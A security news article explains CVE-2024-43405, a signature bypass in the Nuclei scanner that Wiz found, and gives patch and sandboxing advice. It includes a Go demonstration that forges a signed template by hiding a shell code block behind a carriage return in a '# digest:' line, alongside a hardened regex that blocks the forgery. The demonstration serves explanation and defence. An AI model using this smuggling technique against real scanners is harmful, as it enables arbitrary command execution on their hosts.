Researchers discovered a signature verification bypass in the Nuclei vulnerability scanner. Exploiting the flaw could allow an adversary to slip malicious code into a template that still passes as signed, and to have it executed on the system running the scanner.
A Nuclei Vulnerability Allowed Malicious Code Injection
The research team at Wiz discovered a serious vulnerability in the security tool Nuclei that could allow malicious code injection.
Nuclei is an open-source security tool from ProjectDiscovery, popular among organizations of all sizes for vulnerability scanning. It uses YAML-based templates to detect specific, known vulnerabilities, which is what makes it effective at pinpointing exact issues rather than generic weaknesses. It currently boasts over 2.1 million downloads on its GitHub page.
As explained in their post, the vulnerability was a signature verification bypass that could let an adversary include malicious code in a template without invalidating its signature.
Nuclei's signature verification involves four steps:
1) extracting the signature by using a regex to find the # digest: line,
2) removing that line from the template,
3) hashing the remaining content, and
4) validating the hash against the extracted signature.
After these steps, the verified template (not the signature) is parsed as YAML using Go's gopkg.in/yaml.v2 library.
The vulnerability existed because two different parsers decide what a "line" is: the verification step uses a regex, while execution relies on the YAML parser, and the two disagree on where the digest line ends. As stated,
"The regex-based signature parser uses the pattern `(?m)^#\\sdigest:\s.+$` to identify lines starting with `# digest:`. Meanwhile, the YAML parser treats `# digest:` as a comment, ignoring it during execution. This creates a mismatch: the signature verification logic operates based on regex rules, while the execution logic relies on YAML parsing."
This conflict allowed an adversary to hide malicious content inside a template in a way that verification never sees but the YAML parser does. The trick is the carriage return. In Go's multiline regex mode, `$` only matches before `\n` and `.` consumes a `\r` like any other character, so a line such as `# digest: <anything>\rcode: ...` is treated as a single comment line and stripped in its entirety before hashing; the hash of what remains still matches the legitimate signature. The YAML parser, by contrast, treats `\r` as a line break, so everything after it becomes ordinary template content. Because Nuclei templates can carry shell commands (the code protocol), that smuggled content can be arbitrary command execution on the host running the scanner.
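To make the mismatch concrete, here is an added example in Go (written for this article, not code from Nuclei or Wiz) that reproduces the four verification steps above with the quoted regex and compares what the regex sees with what a YAML line scanner sees. It assumes: HMAC-SHA256 over the stripped template as a stand-in for Nuclei's real signature scheme; a constructed four-line template; a payload in the shape of a Nuclei code block; and a small splitter that mimics the YAML rule that a bare carriage return ends a line (gopkg.in/yaml.v2 follows it) instead of pulling in the real parser. The strict regex at the end illustrates the principle of a fix (both sides must agree on what ends a line) and is not the upstream 3.3.2 patch.

```go
package main

import (
	"bytes"
	"crypto/hmac"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// Pattern as quoted from the write-up. In Go's RE2, (?m) makes ^ and $ match at "\n"
// boundaries only, and "." matches every byte except "\n", so a bare "\r" is just
// another character inside the digest line.
var reDigest = regexp.MustCompile(`(?m)^#\sdigest:\s.+$`)

// Hardened variant (illustration of the fix principle, not the upstream patch): the
// digest value may not contain either line-break character, so the regex and the YAML
// scanner agree on where the line ends.
var reDigestStrict = regexp.MustCompile(`(?m)^#\sdigest:\s[^\r\n]+$`)

// Constructed, deliberately minimal template body (any YAML document would do).
const sampleTemplate = "id: example-check\ninfo:\n  name: Example\n  severity: info\n"

// canonical is steps 2 and 3 of the process: drop every digest line the given regex
// recognises, trim surrounding whitespace, and return the bytes that get hashed.
func canonical(re *regexp.Regexp, data []byte) []byte {
	return bytes.TrimSpace(re.ReplaceAll(data, nil))
}

// mac computes the stand-in "signature" (HMAC-SHA256, an assumption for the example;
// the bypass does not depend on the signature algorithm).
func mac(key, body []byte) string {
	h := hmac.New(sha256.New, key)
	h.Write(body)
	return hex.EncodeToString(h.Sum(nil))
}

// sign appends a "# digest:" line computed over the canonical form of the template.
func sign(template, key []byte) []byte {
	digest := mac(key, canonical(reDigest, template))
	return []byte(fmt.Sprintf("%s\n# digest: %s\n", bytes.TrimSpace(template), digest))
}

// verifyWith is steps 1 to 4: take the first digest line, strip all digest lines,
// hash what is left and compare in constant time.
func verifyWith(re *regexp.Regexp, signed, key []byte) (bool, error) {
	line := re.Find(signed)
	if line == nil {
		return false, errors.New("no digest line")
	}
	digest := strings.TrimSpace(strings.TrimPrefix(string(line), "# digest:"))
	want := mac(key, canonical(re, signed))
	return hmac.Equal([]byte(digest), []byte(want)), nil
}

func verify(signed, key []byte) (bool, error)       { return verifyWith(reDigest, signed, key) }
func verifyStrict(signed, key []byte) (bool, error) { return verifyWith(reDigestStrict, signed, key) }

// forge appends a second digest line whose "value" carries a YAML payload. The pieces
// are joined with "\r": to reDigest this is one comment line that is stripped before
// hashing; to a YAML scanner, which treats "\r" as a line break, it is several lines.
func forge(signed []byte, payloadLines []string) []byte {
	injected := "# digest: 00\r" + strings.Join(payloadLines, "\r") + "\n"
	return []byte(string(signed) + injected)
}

// yamlLines splits the way a YAML scanner does: "\r\n", "\r" and "\n" all end a line.
func yamlLines(data []byte) []string {
	s := strings.ReplaceAll(string(data), "\r\n", "\n")
	s = strings.ReplaceAll(s, "\r", "\n")
	return strings.Split(s, "\n")
}

// regexLines splits the way (?m)^...$ in Go sees the document: only "\n" ends a line.
func regexLines(data []byte) []string {
	return strings.Split(string(data), "\n")
}

var reTopKey = regexp.MustCompile(`^([A-Za-z_][A-Za-z0-9_-]*):`)

// topLevelKeys returns the mapping keys at column 0. Comment lines contribute nothing,
// which is why a "# digest:" line is harmless unless something splits it first.
func topLevelKeys(lines []string) []string {
	var keys []string
	for _, l := range lines {
		if m := reTopKey.FindStringSubmatch(l); m != nil {
			keys = append(keys, m[1])
		}
	}
	return keys
}

func contains(xs []string, x string) bool {
	for _, v := range xs {
		if v == x {
			return true
		}
	}
	return false
}

func main() {
	key := []byte("demo-signing-key") // constructed key
	signed := sign([]byte(sampleTemplate), key)
	// Payload in the shape of a Nuclei code block (assumed shape, constructed here).
	forged := forge(signed, []string{"code:", "  - engine:", "      - sh", "    source: id"})

	ok, _ := verify(forged, key)
	fmt.Println("regex verifier accepts forged template:", ok)
	fmt.Println("top-level keys, regex view:", topLevelKeys(regexLines(forged)))
	fmt.Println("top-level keys, YAML view: ", topLevelKeys(yamlLines(forged)))
	ok, _ = verifyStrict(forged, key)
	fmt.Println("strict verifier accepts forged template:", ok)
}
```

Running it shows the regex-based verifier accepting the forged template, the regex view of the document containing no `code` key while the YAML view does, and the stricter verifier rejecting it (while still accepting the genuine one). Appending the same payload with ordinary `\n` line breaks is caught, which is the whole point: the bypass needs a character that one tokenizer treats as a line break and the other does not. The portable lesson is that whatever signs a canonical form must canonicalise with exactly the same tokenizer the consumer later uses.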
This vulnerability, tracked as CVE-2024-43405, received a high severity rating with a CVSS score of 7.8.
Following the researchers' report, ProjectDiscovery patched the vulnerability in Nuclei 3.3.2, so users should make sure they are running that version or later to receive the fix. Where an immediate upgrade isn't possible, the researchers advised running Nuclei in an isolated or sandboxed environment and, given that templates can execute commands, being cautious about running templates from untrusted sources.
Let us know your thoughts in the comments.